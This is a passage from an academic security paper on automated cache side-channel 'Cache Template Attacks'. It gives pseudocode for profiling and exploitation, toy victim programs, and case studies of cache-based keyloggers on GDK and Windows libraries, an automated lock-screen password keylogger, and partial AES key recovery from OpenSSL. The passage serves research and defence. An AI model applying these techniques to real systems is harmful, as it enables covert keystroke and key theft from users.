tual addresses in the allocated read-only shared memory
region, the attacker accesses the same physical memory
and the same cache lines (due to the physically-indexed
last level cache) as the process under attack. Therefore,
the attacker completely bypasses address space layout
randomization (ASLR). Also, due to shared memory, the
additional memory consumption caused by the attacker
process is negligible, i.e., in the range of a few megabytes
at most.
In general, both phases are performed online on the
attacked system and, therefore, cannot be prevented
through differences in binaries due to different versions
or the concept of software diversity [12]. However, if
online profiling is not possible, e.g., in case the eventsmust be triggered by a user or Flush+Reload is not pos-
sible on the attacked system, it can also be performed in a
controlled environment. Below, we describe the profiling
phase and the exploitation phase in more detail.
3.1 Profiling Phase
The profiling phase measures how many cache hits occur
on a specific address during the execution of a specific
event, i.e., the cache-hit ratio . The cache-hit ratios for
different events are stored in the Cache Template matrix
which has one column per event and one row per address.
We refer to the column vector for an event as a profile .
Examples of Cache Template matrices can be found in
Section 4 and Section 5.1.
Anevent in terms of a Cache Template Attack can be
anything that involves code execution or data accesses,
e.g., low-frequency events, such as keystrokes or receiv-
ing an email, or high-frequency events, such as encryp-
tion with one or more key bits set to a specific value. To
automate the profiling phase, it must be possible to trig-
ger the event programmatically, e.g., by calling a func-
tion to simulate a keypress event, or executing a program.
The Cache Template matrix is computed in three steps.
The first step is the generation of the cache-hit trace and
the event trace. This is the main computation step of the
Cache Template Attack, where the data for the Template
is measured. In the second step, we extract the cache-hit
ratio for each trace and store it in the Cache Template
matrix. In a third post-processing step, we prune rows
and columns which contain redundant information from
the matrix. Algorithm 1 summarizes the profiling phase.
We explain the corresponding steps in detail below.
Algorithm 1: Profiling phase.
Input : Set of events E, target program binary B,
duration d
Output : Cache Template matrix T
Map binary Binto memory
foreach event e in E do
foreach address a in binary B do
while duration d not passed do
simultaneously
Trigger event eand save event trace g(E)
a,e
Flush+Reload attack on address a
and save cache-hit trace g(H)
a,e
end
Extract cache-hit ratio Ha,efrom g(E)
a,e
andg(H)
a,eand store it in T
end
end
Prune Cache Template matrix T
4
0 0.1 0.2MissHit
TIME IN CYCLES2.24 2.25 2.26
·107Event trace Cache-hit traceEvent start
Cache-hit phase
Event endFigure 1: Trace of a single keypress event for address
0x4ebc0 oflibgdk.so .
Cache-Hit Trace and Event Trace. The generation of
the cache-hit trace and the event trace is repeated for each
event and address for the specified duration (the while
loop of Algorithm 1). The cache-hit trace g(H)
a,eis a binary
function which has value 1 for every timestamp twhere
a cache hit has been observed. The function value re-
mains 1 until the next timestamp twhere a cache miss has
been observed. We call subsequent cache hits a cache-hit
phase. The event trace g(E)
a,eis a binary function which has
value 1 when the processing of one specific event estarts
or ends and value 0 for all other points.
In the measurement step, the binary under attack is
executed and the event is triggered constantly. Each ad-
dress of the attacked binary is profiled for a specific du-
ration d. It must be long enough to trigger one or more
events. Therefore, ddepends only on the execution time
of the event to be measured. The more events triggered
within the specified duration d, the more accurate the re-
sulting profile is. However, increasing the duration din-
creases the overall time required for the profiling phase.
The results of this measurement step are a cache-hit
trace and an event trace, which are generated for all ad-
dresses ain the binary and all events ewe want to profile.
An excerpt of such a cache-hit trace and the correspond-
ing event trace is shown in Figure 1. The start of the
event is measured directly before the event is triggered.
As we monitor library code, the cache-hit phase is mea-
sured before the attacked binary observes the event.
The generation of the traces can be sped up by two
factors. First, in case of a cache miss, the CPU always
fetches a whole cache line. Thus, we cannot distinguish
between offsets of different accesses within a cache line
and we can deduce the same information by probing only
one address within each cache-line sized memory area.
Second, we reduce the overall number of triggered
events by profiling multiple addresses at the same time.
However, profiling multiple addresses on the same page
can cause prefetching of more data from this page.Therefore, we can only profile addresses on different
pages simultaneously. Thus, profiling all pages only
takes as long as profiling a single page.
In case of low-frequency events, it is possible to pro-
file all pages within one binary in parallel. However, this
may lead to less accurate cache-hit traces g(H)
a,e, i.e., tim-
ing deviations above 1 microsecond from the real event,
which is only acceptable for low-frequency events.
Hit-Ratio Extraction. After the cache-hit trace and
the event trace have been computed for a specific event e
and a specific address a(the while loop of Algorithm 1),
we derive the cache-hit ratio for each event and address.
The cache-hit ratio Ha,eis either a simple value or a time-
dependent ratio function. In our case it is the ratio of
cache hits on address aand the number of times the event
ehas been triggered within the profiling duration d.
To illustrate the difference between a cache-hit ratio
with time dependency and without time dependency, we
discuss two such functions. The cache-hit ratio with
time dependency can be defined as follows. The event
traces contain the start and end points of the processing
of one event e. These start and end points define the rel-
evant parts (denoted as slices ) within the cache-hit trace.
The slices are stored in a vector and scaled to the same
length. Each slice contains a cache-hit pattern relative to
the event e. If we average over this vector, we get the
cache-hit ratio function for event e.
The second, much simpler approach is to define the
cache-hit ratio without time dependency. In this case, we
count the number of cache hits kon address aand divide
it by the number of times nthe event ehas been triggered
within the profiling duration d. That is, we define Ha,e=
k
n. In case of a low-noise side channel and event detection
through single cache hits, it is sufficient to use a simple
hit-ratio extraction function.
Like the previous step, this step is repeated for all ad-
dresses ain the binary band all events eto be profiled.
The result is the full Cache Template matrix T. We de-
note the column vectors ⃗peasprofiles for specific events.
Pruning. In the exploitation phase, we are limited re-
garding the number of addresses we can attack. There-
fore, we want to reduce the number of addresses in the
Cache Template. We remove redundant rows from the
Cache Template matrix and merge events which cannot
be distinguished based on their profiles ⃗pe.
As cache hits can be independent of an event, the mea-
sured cache-hit ratio on a specific address can be inde-
pendent of the event, i.e., code which is always executed,
frequent data accesses by threads running all the time,
or code that is never executed and data that is never ac-
cessed. In order to be able to detect an event e, the set
5
of events has to contain at least one event e′which does
not include event e. For example, in order to be able to
detect the event “user pressed key A” we need to profile
at least one event where the user does not press key A.
The pruning happens in three steps on the matrix.
First, the removal of all addresses that have a small dif-
ference between minimum and maximum cache-hit ra-
tio for all events. Second, merging all similar columns
(events) into one set of events, i.e., events that cannot be
distinguished from each other are merged into one col-
umn. The similarity measure for this is, for example,
based on a mean squared error (MSE) function. Third,
the removal of redundant lines. These steps ensure that
we select the most interesting addresses and also allows
us to reduce the attack complexity by reducing the over-
all number of monitored addresses.
We measure the reliability of a cache-based side chan-
nel by true and false positives as well as true and false
negatives. Cache hits that coincide with an event are
counted as true positive and cache hits that do not coin-
cide with an event as false positive. Cache misses which
coincide with an event are counted as true negative and
cache misses which do not coincide with an event as false
negative. Based on these four values we can determine
the accuracy of our Template, for instance, by computing
the F-Score, which is defined as the harmonic mean of
the cache-hit ratio and the positive predictive value (per-
centage of true positives of the total cache hits). High
F-Score values show that we can distinguish the given
event accurately by attacking a specific address. In some
cases further lines can be pruned from the Cache Tem-
plate matrix based on these measures. The true positive
rate and the false positive rate for an event ecan be de-
termined by the profile ⃗peofeand the average over all
profiles except e.
Runtime of the Profiling Phase. Measuring the
cache-hit ratio is the most expensive step in our attack.
To quantify the cost we give two examples. In both
cases we want to profile a 1 MB library, once for a low-
frequency event, e.g., a keypress, and once for a high-
frequency event, e.g., an encryption. In both cases, we
try to achieve a runtime which is realistic for offline and
online attacks while maintaining a high accuracy.
We choose a profiling duration of d=0.8 seconds for
the low-frequency event. During 0 .8 seconds we can trig-
ger around 200 events, which is enough to create a highly
accurate profile. Profiling each address in the library for
0.8 seconds would take 10 days. Profiling only cache-
line-aligned addresses still takes 4 hours. Applying both
optimizations, the full library is profiled in 17 seconds.
In case of the high-frequency event, we attack an en-
cryption. We assume that one encryption and the cor-
responding Flush+Reload measurement take 520 cycleson average. As in the previous example, we profile each
address 200 times and, thus, we need 40–50 microsec-
onds per address, i.e., d=50μs. The basic attack takes
less than 55 seconds to profile the full library for one
event. Profiling only cache-line-aligned addresses takes
less than 1 second and applying both optimizations re-
sults in a negligible runtime.
As already mentioned above, the accuracy of the re-
sulting profile depends on how many times an event can
be triggered during profiling duration d. In both cases we
chose durations which are more than sufficient to create
accurate profiles and still achieve reasonable execution
times for an online attack. Our observations showed that
it is necessary to profile each event at least 10 times to
get meaningful results. However, profiling an event more
than a few hundred times does not increase the accuracy
of the profile anymore.
3.2 Exploitation Phase
In the exploitation phase we execute a generic spy pro-
gram which performs either the Flush+Reload or the
Prime+Probe algorithm. For all addresses in the Cache
Template matrix resulting from the profiling phase, the
cache activity is constantly monitored.
We monitor all addresses and record whether a cache
hit occurred. This information is stored in a boolean vec-
tor⃗h. To determine which event occurred based on this
observation, we compute the similarity S(⃗h,⃗pe)between
⃗hand each profile ⃗pefrom the Cache Template matrix.
The similarity measure Scan be based, for example, on
a mean squared error (MSE) function. Algorithm 2 sum-
marizes the exploitation phase.
Algorithm 2: Exploitation phase.
Input : Target program binary b,
Cache Template matrix T= (⃗pe1,⃗pe2,...,⃗pen)
Map binary binto memory
repeat
foreach address a in T do
Flush+Reload attack on address a
Store 0/1 in ⃗h[a]for cache miss/cache hit
end
if⃗peequals ⃗h w.r.t. similarity measure then
Event edetected
end
The exploitation phase has the same requirements as
the underlying attack techniques. The attacker needs to
be able to execute a spy program on the attacked sys-
tem. In case of Flush+Reload, the spy program needs
no privileges, except opening the attacked program bi-
nary in a read-only shared memory. It is even possible
6
1i n t map [ 1 3 0 ] [ 1 0 2 4 ] = {{−1U}, . . . ,{−1 3 0U}};
2i n t main ( i n t argc , char∗∗ a rg v ){
3 while ( 1 ){
4 i n t c = g e t c h a r ( ) ; / / u n b u f f e r e d
5 i f( map [ ( c % 128) + 1 ] [ 0 ] == 0)
6 e x i t ( −1) ;
7} }
Listing 1: Victim program with large array on Linux
to attack binaries running in a different virtual machine
on the same physical machine, if the hypervisor has page
deduplication enabled. In case of Prime+Probe, the spy
program needs no privileges at all and it is even possi-
ble to attack binaries running in a different virtual ma-
chine on the same physical machine, as shown by Irazo-
qui et al. [21]. However, the Prime+Probe technique is
more susceptible to noise and therefore the exploitation
phase will produce less reliable results, making attacks
on low-frequency events more difficult.
The result of the exploitation phase is a log file con-
taining all detected events and their corresponding times-
tamps. The interpretation of the log file still has to be
done manually by the attacker.
4 Attacks on Artificial Applications
Before we actually exploit cache-based vulnerabilities in
real applications in Section 5, we demonstrate the basic
working principle of Cache Template Attacks on two ar-
tificial victim programs. These illustrative attacks show
how Cache Template Attacks automatically profile and
exploit cache activity in any program. The two attack
scenarios we demonstrate are: 1) an attack on lookup
tables, and 2) an attack on executed instructions. Hence,
our ideal victim program or library either contains a large
lookup table which is accessed depending on secret in-
formation, e.g., depending on secret lookup indices, or
specific portions of program code which are executed
based on secret information.
Attack on Data Accesses. For demonstration pur-
poses, we spy on simple events like keypresses. In
our victim program, shown in Listing 1, each keypress
causes a memory access in a large array called map.
These key-based accesses are 4096 bytes apart from each
other to avoid triggering the prefetcher. The array is ini-
tialized with static values in order to place it in the data
segment and to guarantee that each page contains differ-
ent data and, thus, is not deduplicated in any way. It is
necessary to place it in the data segment in order to make
it shareable with the spy program.
In the profiling phase of the Cache Template Attack,
we simulate different keystroke events using the X11 au-
ADDRESSKEY
0123456789
0x32040
0x33040
0x34040
0x35040
0x36040
0x37040
0x38040
0x39040
0x3a040
0x3b040
Figure 2: Cache Template matrix for the artificial victim
program shown in Listing 1. Dark cells indicate high
cache-hit ratios.
tomation library libxdo . This library can be linked stat-
ically into the spy program, i.e., it does not need to be
installed. The Cache Template matrix is generated as de-
scribed in Section 3. Within a duration of d=0.8 sec-
onds we simulated around 700 keypress events. The re-
sulting Cache Template matrix can be seen in Figure 2
for all number keys. We observe cache hits on addresses
that are exactly 4 096 bytes apart, which is due to the data
type and the dimension of the maparray. In our measure-
ments, there were less than 0.3% false positive cache hits
on the corresponding addresses and less than 2% false
negative cache hits. The false positive and false negative
cache hits are due to the high key rate in the keypress
simulation.
For verification purposes, we executed the generated
keylogger for a period of 60 seconds and randomly
pressed keys on the keyboard. In this setting we mea-
sured no false positives and no false negatives at all.
This results from significantly lower key rates than in the
profiling phase. The table is not used by any process
other than the spy and the victim process and the proba-
bility that the array access happens exactly between the
reload and the flush instruction is rather small, as we have
longer idle periods than during the profiling phase. Thus,
we are able to uniquely identify each key without errors.
Attack on Instruction Executions. The same attack
can easily be performed on executed instructions. The
source code for this example is shown in Listing 2. Each
key is now processed in its own function, as defined by
theCASE(X) macro. The functions are page aligned to
avoid prefetcher activity. The NOP1024 macro generates
1024 nopinstructions, which is enough to avoid acciden-
tal code prefetching of function code.
Our measurements show that there is no difference
between Cache Template Attacks on code and data ac-
cesses.
Performance Evaluation. To examine the perfor-
mance limits of the exploitation phase of Cache Template
Attacks, we evaluated the number of addresses which can
7
1# d e f i n e NOP1024 /∗1024 t i m e s asm ( ” nop ” ) ; ∗/
2# d e f i n e CASE(X) c as e X:\
3{ALIGN(0 x1000 ) void f ##X( ){NOP1024};\
4 f ##X( ) ; break ;}
5i n t main ( i n t argc , char∗∗ a rg v ){
6 while ( 1 ){
7 i n t c = g e t c h a r ( ) ; / / u n b u f f e r e d
8 s w i t c h ( c ){
9 CASE ( 0 ) ;
10 / / . . .
11 CASE( 1 2 8 ) ;
12} } }
Listing 2: Victim program with long functions on Linux
be accurately monitored simultaneously at different key
rates. At a key rate of 50 keys per second, we man-
aged to spy on 16000 addresses simultaneously on an
Intel i5 Sandy Bridge CPU without any false positives or
false negatives. The first errors occurred when monitor-
ing 18000 addresses simultaneously. At a key rate of 250
keys per second, which is the maximum on our system,
we were able to spy on 4000 addresses simultaneously
without any errors. The first errors occurred when moni-
toring 5000 addresses simultaneously. In both cases, we
monitor significantly more addresses than in any practi-
cal cache attack today.
However, monitoring that many addresses is only pos-
sible if their position in virtual memory is such that the
prefetcher remains inactive. Accessing several consec-
utive addresses on the same page causes prefetching of
more data, resulting in cache hits although no program
accessed the data. The limiting effect of the prefetcher
on the Flush+Reload attack has already been observed
by Yarom and Benger [55]. Based on these observations,
we discuss the possibility of using the prefetcher as an
effective countermeasure against cache attacks in Sec-
tion 6.3.
5 Attacks on Real-World Applications
In this section, we consider an attack scenario where an
attacker is able to execute an attack tool on a targeted
machine in unprivileged mode. By executing this at-
tack tool, the attacker extracts the cache-activity profiles
which are exploited subsequently. Afterwards, the at-
tacker collects the secret information acquired during the
exploitation phase.
For this rather realistic and powerful scenario we
present various case studies of attacks launched against
real applications. We demonstrate the power of automat-
ically launching cache attacks against any binary or li-
brary. First, we launch two attacks on Linux user inter-
faces, including GDK-based user interfaces, and an at-
tack against a Windows user interface. In all attacks wesimulate the user input in the profiling phase. Thus, the
attack can be automated on the device under attack. To
demonstrate the range of possible applications, we also
present an automated attack on the T-table-based AES
implementation of OpenSSL 1.0.2 [38].
5.1 Attack on Linux User Interfaces
There exists a variety of software-based side-channel at-
tacks on user input data. These attacks either measure
differences in the execution time of code in other pro-
grams or libraries [49], approximate keypresses through
CPU and cache activity [45], or exploit system ser-
vices leaking user input data [57]. In particular,
Zhang et al. [57] use information about other processes
from procfs on Linux to measure inter-keystroke tim-
ings and derive key sequences. Their proposed coun-
termeasures can be implemented with low costs and
prevent their attack completely. We, however, employ
Cache Template Attacks to find and exploit leaking side-
channel information in shared libraries automatically in
order to spy on keyboard input.
Given root access to the system, it is trivial to write
a keylogger on Linux using /dev/input/event* de-
vices. Furthermore, the xinput tool can also be used to
write a keylogger on Linux, but root access is required to
install it. However, using our approach of Cache Tem-
plate Attacks only requires the unprivileged execution
of untrusted code as well as the capability of opening
the attacked binaries or shared libraries in a read-only
shared memory. In the exploitation phase one round of
Flush+Reload on a single address takes less than 100
nanoseconds. If we measure the average latency between
keypress and cache hit, we can determine the actual key-
press timing up to a few hundred nanoseconds. Com-
pared to the existing attacks mentioned above, our at-
tack is significantly more accurate in terms of both event
detection (detection rates near 100%) and timing devia-
tions.
In all attacks presented in this section we compute
time-independent cache-hit ratios.
Attack on the GDK Library. Launching the Cache
Template profiling phase on different Linux applications
revealed thousands of addresses in different libraries, bi-
naries, and data files showing cache activity upon key-
presses. Subsequently, we targeted different keypress
events in order to find addresses distinguishing the differ-
ent keys. Figure 3 shows the Cache Template of a mem-
ory area in the GDK library libgdk-3.so.0.1000.8 ,
a part of the GTK framework which is the default user-
interface framework on many Linux distributions.
Figure 3 shows several addresses that yield a cache
hit with a high accuracy if and only if a certain key is
8
ADDRESSKEY
ghijklmnopqrstuvwxyz
0x7c100
0x7c140
0x7c180
0x7c1c0
0x7c200
0x7c240
0x7c280
0x7c340
0x7c380
0x7c3c0
0x7c400
0x7c440
0x7c480
0x7c4c0
0x7c500
0x7c540
0x7c580
0x7c5c0
0x7c600
0x7c640
0x7c680
0x7c6c0
0x7c700
0x7c740
0x7c780
0x7c7c0
0x7c800
0x7c840
0x7c880
0x7c8c0
0x7c900
0x7c940
0x7c980
0x7c9c0
0x7ca00
0x7cb80
0x7cc40
0x7cc80
0x7ccc0
0x7cd00
0x7cd40
Figure 3: Excerpt of the GDK Cache Template. Dark
cells indicate key-address-pairs with high cache-hit ra-
tios.
pressed. For instance, every keypress on key nresults in
cache hit on address 0x7c800 , whereas the same address
reacts in only 0 .5% of our tests on other keypresses. Fur-
thermore, we found a high cache-hit ratio on some ad-
dresses when a key is pressed (i.e., 0x6cd00 inlibgdk ),
the mouse is moved (i.e., 0x28760 inlibgdk ) or a mod-
ifier key is pressed (i.e., 0x72fc0 inlibgdk ). We also
profiled the range of keys a–f but it is omitted from Fig-
ure 3 because no high cache-hit ratios have been ob-
served for the shown addresses.
We use the spy tool described in Section 3.2 in order
to spy on events based on the Cache Template. We are
able to accurately determine the following sets of pressed
keys:{i},{j},{n},{q},{v},{l,w},{u,z},{g,h,k,t}. That
is, we cannot distinguish between keys in the same set,
but keys in one set from keys in other sets. Similarly, we
can deduce whether a key is contained in none of these
sets.
Not as part of our attack, but in order to understand
how keyboard input is processed in the GDK library, we
analyzed the binary and the source code. In general,
we found out that most of the addresses revealed in the
profiling phase point to code executed while processing
keyboard input. The address range discussed in this sec-
tion contains the array gdk_keysym_to_unicode_tab
which is used to translate key symbols to unicode specialcharacters. The library performs a binary search on this
array, which explains why we can identify certain keys
accurately, namely the leaf nodes in the binary search.
As the corresponding array is used for keyboard input
in all GDK user-interface components, including pass-
word fields, our spy tool works for all applications that
use the GDK library. This observation allows us to use
Cache Template Attacks to build powerful keyloggers
for GDK-based user interfaces automatically. Even if
we cannot distinguish all keys from each other, Cache
Template Attacks allow us to significantly reduce the
complexity of cracking a password. In this scenario,
we are able to identify 3 keys reliably, as well as the
total number of keypresses. Thus, in case of a lower-
case password we can reduce the entropy per character
from log2(26) =4.7 to 4 .0 bits. Attacking more than
3 addresses in order to identify more keys adds a sig-
nificant amount of noise to the results, as it triggers the
prefetcher. First experiments demonstrated the feasibil-
ity of attacking the lock screen of Linux distributions.
However, further evaluation is necessary in order to reli-
ably determine the effectiveness of this approach.
Attack on GDK Key Remapping. If an attacker has
additional knowledge about the attacked system or soft-
ware, more efficient and more powerful attacks are pos-
sible. Inspired by Tannous et al. [49] who performed a
timing attack on GDK key remapping, we demonstrate a
more powerful attack on the GDK library, by examining
how the remapping of keys influences the sets of iden-
tifiable keypresses. The remapping functionality uses a
large key-translation table gdk_keys_by_keyval which
spreads over more than four pages.
Hence, we repeated the Cache Template Attack on the
GDK library with a small modification. Before mea-
suring cache activity for an address during an event,
we remapped one key to the key code at that address,
retrieved from the gdk_keys_by_keyval table. We
found significant cache activity for some address and
key-remapping combinations.
When profiling each key remapping for d=0.8 sec-
onds, we measured cache activity in 52 cache-line-sized
memory regions. In verification scans, we found 0.2-
2.5% false positive cache hits in these memory regions.
Thus, we have found another highly accurate side chan-
nel for specific key remappings. The results are shown in
the F-score graph in Figure 4. High values allow accu-
rate detection of keypresses if the key is remapped to this
address. Thus, we find more accurate results in terms of
timing in our automated attack than Tannous et al. [49].
We can only attack 8 addresses in the profiled mem-
ory area simultaneously, since it spreads over 4 pages
and we can only monitor 2 or 3 addresses without trig-
gering the prefetcher. Thus, we are able to remap any 8
9
0x71000 0x72000 0x73000 0x7400000.51
ADDRESSF-SCOREFigure 4: Excerpt of the F-score plot for the address
range of the gdkkeys bykeyval table. High values
reveal addresses that can be exploited.
keys to these addresses and reliably distinguish them. In
combination with the 3 addresses of our previous results,
we are able to distinguish at least 11 keys and observe
the timestamp of any keystroke in the system based on
cache accesses simultaneously.
It is also possible to remap more than one key to the
same key code. Hence, it is possible to distinguish be-
tween groups of keys. If we consider a lower-case pass-
word again, we can now reduce the entropy per character
from log2(26) =4.7 to 1 .4 bits.
We also profiled keypresses on capslock and shift. Al-
though we were able to log keypresses on both keys, we
did not consider upper case or mixed case input. The
exploitation phase automatically generates a log file con-
taining the information observed through the cache side
channel. However, interpretation of these results, such as
deriving a program state from a sequence of events (shift
key pressed or capslock active) and the influence of the
program state on subsequent events is up to analysis of
the results after the attack has been performed.
Tannous et al. [49] also described a login-detection
mechanism in order to avoid remapping keys unless the
user types in a password field. The spy program simply
watches /proc to see whether a login program is run-
ning. Then the keys are remapped. As soon as the user
pauses, the original key mappings are restored. The user
will then notice a password mismatch, but the next pass-
word entry will work as expected.
Our completely automated password keylogger is a
single binary which runs on the attacked system. It maps
the GDK library into its own address space and performs
the profiling phase. The profiling of each keypress re-
quires the simulation of the keypress into a hidden win-
dow. Furthermore, some events require the key remap-
ping we just described. Finally, the keylogger switches
into the exploit mode. As soon as a logon screen is de-
tected, for instance, after the screensaver was active or
the screen was locked, the keys are remapped and all key-
presses are logged into a file accessible by the attacker.
Thus, all steps from the deployment of the keylogger to
the final log file are fully automated.5.2 Attacks on other Linux Applications
We also found leakage of accurate keypress timings in
other libraries, such as the ncurses library (i.e., off-
set0xbf90 inlibncurses.so ), and in files used to
cache generated data related to user text input, such as
/usr/lib/locale/locale-archive . The latter one is
used to translate keypresses into the current locale. It is
a generated file which differs on each system and which
changes more frequently than the attacked libraries. In
consequence, it is not possible to perform an offline at-
tack, i.e., to use a pre-generated Cache Template in the
exploitation phase on another system. Still, our concept
of Cache Template Attacks allows us to perform an on-
line attack, as profiling is fully automated by generat-
ing keystrokes through libxdo or comparable libraries.
Thus, keystroke side channels are found within a few sec-
onds of profiling. All keypress-timing side channels we
found have a high accuracy and a timing deviation of less
than 1 microsecond to the actual keypress.
In order to demonstrate Cache Template Attacks on a
low-frequency event which is only indirectly connected
to keypresses, we attacked sshd , trying to detect when
input is sent over an active ssh connection. The received
characters are unrelated to the local user input. When
profiling for a duration of d=0.8 seconds per address,
we found 428 addresses showing cache activity when
a character was received. We verified these results for
some addresses manually. None of these checked ad-
dresses showed false positive hits within a verification
period of 60 seconds. Thus, by exploiting the resulting
Cache Template matrix, we are able to gain accurate tim-
ings for the transmitted characters (significantly less than
1 microsecond deviation to the transmission of the char-
acter). These timings can be used to derive the transmit-
ted letters as shown by Zhang et al. [57].
5.3 Attack on Windows User Interfaces
We also performed Cache Template Attacks on Win-
dows applications. The attack works on Windows using
MinGW identically to Linux. Even the implementation
is the same, except for the keystroke simulation which
is now performed using the Windows API instead of the
libxdo library, and the file under attack is mapped using
LoadLibrary instead of mmap . We performed our attack
on Windows 7 and Windows 8.1 systems with the same
results on three different platforms, namely Intel Core
2 Duo, Intel i5 Sandy Bridge, and Intel i5 Ivy Bridge.
As in the attacks on Linux user interfaces, address space
layout randomization has been activated during both pro-
filing and exploitation phase.
In an automated attack, we found cache activity upon
keypresses in different libraries with reasonable accu-
10
racy. For instance, the Windows 7 common control li-
brary comctl32.dll can be used to detect keypresses
on different addresses. Probing 0xc5c40 results in cache
hits on every keypress and mouse click within text fields
accurately. Running the generated keypress logger in a
verification period of 60 seconds with keyboard input by
a real user, we found only a single false positive event
detection based on this address. Address 0xc6c00 reacts
only on keypresses and not on mouse clicks, but yields
more false positive cache hits in general. Again, we can
apply the attack proposed by Zhang et al. [57] to recover
typed words from inter-keystroke timings.
We did not disassemble the shared library and there-
fore do not know which function or data accesses cause
the cache hit. The addresses were found by starting the
Cache Template Attack with the same parameters as on
Linux, but on a Windows shared library instead of a
Linux shared library. As modern operating systems like
Windows 7 and Windows 8.1 employ an immense num-
ber of shared libraries, we profiled only a few of these
libraries. Hence, further investigations might even re-
veal addresses for a more accurate identification of key-
presses.
5.4 Attack on a T-table-based AES
Cache attacks have been shown to enable powerful at-
tacks against cryptographic implementations. Thus, ap-
propriate countermeasures have already been suggested
for the case of AES [16, 26, 31, 44]. Nevertheless, in or-
der to compare the presented approach of Cache Tem-
plate Attacks to related attacks, we launched an ef-
ficient and automated access-driven attack against the
AES T-table implementation of OpenSSL 1.0.2, which
is known to be insecure and susceptible to cache attacks
[2, 4, 5, 17, 22, 23, 40, 54]. Recall that the T-tables are ac-
cessed according to the plaintext pand the secret key k,
i.e.,Tj[pi⊕ki]with i≡jmod 4 and 0≤i<16, dur-
ing the first round of the AES encryption. For the sake of
brevity, we omit the full details of an access-driven cache
attack against AES and refer the interested reader to the
work of Osvik et al. [40, 50].
Attack of Encryption Events. In a first step, we pro-
filed the two events “no encryption” and “encryption
with random key and random plaintext”. We profiled
each cache-line-aligned address in the OpenSSL library
during 100 encryptions. On our test system, one encryp-
tion takes around 320 cycles, which is very fast compared
to a latency of at least 200 cycles caused by a single cache
miss. In order to make the results more deterministically
reproducible, we measure whether a cache line was used
only after the encryption has finished. Thus, the profilingphase does not run in parallel and only one cache hit or
miss is measured per triggered event.
This profiling step takes less than 200 seconds. We
detected cache activity on 0 .2%-0.3% of the addresses.
Only 82 addresses showed a significant difference in
cache activity depending on the event. For 18 of these
addresses, the cache-hit ratio was 100% for the encryp-
tion event. Thus, our generated spy tool is able to accu-
rately detect whenever an encryption is performed.
For the remaining 64 addresses the cache-hit ratio was
around 92% for the encryption event. Thus, not each of
these addresses is accessed in every encryption, depend-
ing on key and plaintext. Since we attack a T-table-based
AES implementation, we know that these 64 addresses
must be the T-tables, which occupy 4 KB respectively 64
cache lines. Although this information is not used in the
first generated spy tool, it encourages performing a sec-
ond attack to target specific key-byte values.
Attack on Specific Key-Byte Values. Exploiting the
knowledge that we attack a T-table implementation, we
enhance the attack by profiling over different key-byte
values for a fixed plaintext, i.e., the set of events consists
of the different key-byte values. Our attack remains fully
automated, as we change only the values with which the
encryption is performed. The result is again a log file
containing the accurate timestamp of each event moni-
tored. The interpretation of the log file, of course, in-
volves manual work and is specific to the targeted events,
i.e., key bytes in this case.
For each key byte ki, we profile only the upper 4 bits of
kias the lower 4 bits cannot be distinguished because of
the cache-line size of 64 bytes. This means that we need
to profile only 16 addresses for each key byte ki. Fur-
thermore, on average 92% of these addresses are already
in the cache and the Reload step of the Flush+Reload at-
tack is unlikely to trigger the prefetcher. Thus, we can
probe all addresses after a single encryption. Two pro-
files for different values of k0are shown in Figure 5. The
two traces were generated using 1000 encryptions per
key byte and address to show the pattern more clearly.
According to Osvik et al. [40] and Spreitzer et al. [47]
these plots (or patterns) reveal at least the upper 4 bits of
a key byte and, hence, attacking the AES T-table imple-
mentation works as expected. In our case, experiments
showed that 1 to 10 encryptions per key byte are enough
to infer these upper 4 bits correctly.
In a T-table-based AES implementation, the index of
the T-table is determined by pi⊕ki. Therefore, the same
profiles can be generated by iterating over the different
plaintext byte values while encrypting with a fixed key.
Osvik et al. [40] show a similar plot, generated using the
Evict+Time attack. However, in our attack the profiles
are aggregated into the Cache Template matrix, as de-
11
VALUE OF p0ADDRESS
0
255ADDRESS
0
255
Figure 5: Excerpt of the Cache Template (address range
of the first T-table). The plot is transposed to match [40].
In the left trace k0=0x00 , in the right trace k0=0x51 .
scribed in Section 3.1.
In the exploitation phase, the automatically generated
spy tool monitors cache hits on the addresses from the
Cache Template in order to determine secret key-byte
values. We perform encryptions using chosen plaintexts.
We attack the 16 key bytes kisequentially. In each step
i=0,..., 15, the plaintext is random, except for the up-
per 4 bits of pi, which are fixed to the same chosen value
as in the profiling phase. Hence, the encryption is per-
formed over a chosen plaintext. The spy tool triggers an
encryption, detects when the encryption actually happens
and after each encryption, reports the set of possible val-
ues for the upper 4 bits of key byte ki. As soon as only
one candidate for the upper 4 bits of key byte kiremains,
we continue with the next key byte.
Using Cache Template Attacks, we are able to infer
64 bits of the secret key with only 16–160 encryptions in
a chosen-plaintext attack. Compared to the work of Os-
vik et al. [40] who require several hundred or thousands
encryptions (depending on the measurement approach)
targeting the L1 cache, and the work of Spreitzer and
Plos [47] who require millions of encryptions targeting
the L1 cache on the ARM platform, we clearly observe a
significant performance improvement. More recent work
shows that full key recovery is possible with less than
30000 encryptions [18] using Flush+Reload.
The benefit of our approach, compared to existing
cache attacks against AES, is that our attack is fully auto-
mated. Once the binary is deployed on the target system,
it performs both profiling and exploitation phase auto-
matically and finally returns a log file containing the key
byte candidates to the attacker. Moreover, we do not need
prior knowledge of the attacked system or the attacked
executable or library.
AES T-table implementations are already known to
be insecure and countermeasures have already been in-
tegrated, e.g., in the AES implementation of OpenSSL.
Performing our attack on a non-T-table implementation
(e.g., by employing AES-NI instructions) did not show
key dependent information leakage, but still, we can ac-
curately determine the start and end of the encryption
through the cache behavior. However, we leave it as an
interesting open issue to employ the presented approachof cache template attacks for further investigations of
vulnerabilities in already protected implementations.
Trace-Driven Attack on AES. When attacking an in-
secure implementation of a cryptographic algorithm, an
attacker can often gain significantly more information if
it is possible to perform measurements during the en-
cryption [2, 13], i.e., in case the exact trace of cache hits
and cache misses can be observed. Even if we cannot in-
crease the frequency of the Flush+Reload attack, we are
able to slow down the encryption by constantly flush-
ing the 18 addresses which showed cache activity in ev-
ery profile. We managed to increase the encryption time
from 320 cycles to 16000–20000 cycles. Thus, a more
fine-grained trace of cache hits and cache misses can be
obtained which might even allow the implementation of
trace-driven cache attacks purely in software.
6 Countermeasures
We have demonstrated in Section 5 that Cache Template
Attacks are applicable to real-world applications without
knowledge of the system or the application. Therefore,
we emphasize the need for research on effective coun-
termeasures against cache attacks. In Section 6.1, we
discuss several countermeasures which have been pro-
posed so far. Subsequently, in Section 6.2, we discuss
how Cache Template Attacks can be employed by de-
velopers to detect and eliminate cache-based information
leakage and also by users to detect and prevent cache
attacks running actively on a system. Finally, in Sec-
tion 6.3, we propose changes to the prefetcher to build a
powerful countermeasure against cache attacks.
